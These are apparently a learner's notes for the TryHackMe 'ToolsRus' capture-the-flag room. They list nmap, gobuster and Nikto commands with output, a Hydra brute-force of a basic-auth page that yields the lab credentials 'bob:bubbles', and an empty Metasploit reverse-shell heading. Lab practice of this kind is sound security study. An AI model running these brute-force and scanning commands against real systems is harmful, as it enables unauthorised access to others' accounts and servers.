Notes for ToolsRus room on THM

# Export IP

export IP=10.10.241.126

# Ping host

ping -c 3 $IP

# Gobuster scan: gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

/guidelines           (Status: 301) [Size: 319] [--> http://10.10.241.126/guidelines/]
/protected            (Status: 401) [Size: 460]

# nmap scan: nmap -sC -sV -oN nmapscan $IP

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 24:c5:2d:c5:ee:2b:17:ba:16:f5:07:db:fa:57:3e:7b (RSA)
|   256 2c:db:fa:d9:6c:e2:97:71:8e:68:4a:68:e5:f0:f8:ae (ECDSA)
|_  256 32:f0:4d:12:95:7c:fe:be:84:d9:df:3f:0e:96:92:db (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
1234/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
10617/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# Port 10617 was found during another scan

# Hydra scan: hydra -l bob -P /usr/share/wordlists/rockyou.txt.gz 10.10.241.126 http-get /protected/

[80][http-get] host: 10.10.241.126   login: bob   password: bubbles

http://10.10.241.126/protected/

This protected page has now moved to a different port.

# Nikto Cred enum: nikto -host http://10.10.94.163:1234/manager/html -id bob:bubbles


# Metasploit reverse shell


